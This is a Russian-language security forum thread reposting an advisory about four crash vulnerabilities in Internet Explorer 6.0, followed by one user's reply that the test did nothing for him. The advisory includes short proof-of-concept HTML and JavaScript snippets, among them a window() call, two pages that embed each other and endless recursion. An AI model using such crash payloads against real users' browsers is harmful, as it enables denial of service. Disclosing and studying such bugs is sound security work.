Показано с 1 по 2 из 2.

Множественные уязвимости в Microsoft Internet Explorer

  1. #1
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Shu_b
    Регистрация
    02.11.2004
    Сообщений
    3,553
    Вес репутации
    1662

    Множественные уязвимости в Microsoft Internet Explorer

    Множественные уязвимости в Microsoft Internet Explorer
    Программа: Microsoft Internet Explorer 6.0
    Опасность: Средняя
    Наличие эксплоита: Да
    Описание:
    Обнаруженные уязвимости позволяют удаленному пользователю аварийно завершить работу приложения.

    1. Уязвимость существует в обработке определенных URL при добавлении сайта в ограниченную зону (restricted zone). Удаленный пользователь может с помощью специально сформированного доменного имени вызвать аварийное завершение работы приложения. Пример:

    4.3.2.1btf-errorreporting.btf.de

    2. Переполнение буфера обнаружено при обработке javascript функции window(). Удаленный пользователь может аварийно завершить работу приложения. Пример:

    <body onLoad="window()">

    3. Отказ в обслуживании при обработке подключаемых файлов. Пример:

    Page #1 (save as "btf1.htm"):

    <html><head><title>BTF - MSIE crash</title></head><body>
    < object data="./btf2.htm" width="0" height="0"></object>
    < /body></html>

    Page #2 (save as "btf2.htm"):

    <html><head><title>BTF - MSIE crash</title></head><body>
    < object data="./btf1.htm" width="0" height="0"></object>
    < /body></html>


    4. Множественные переполнения стека в ntdll.dll. Пример:

    <script>
    window.onerror=new Function("history.go(0)");
    function btf(){btf();}
    btf();
    < /script>


    Решение: Способов устранения уязвимости не существует в настоящее время.

    Источник: securitylab.ru

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для drongo
    Регистрация
    17.09.2004
    Адрес
    Israel
    Сообщений
    7,164
    Вес репутации
    994
    Что-то я не понял , сохранил как сказано и запустил -> ничего не случилось .

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01639 seconds with 19 queries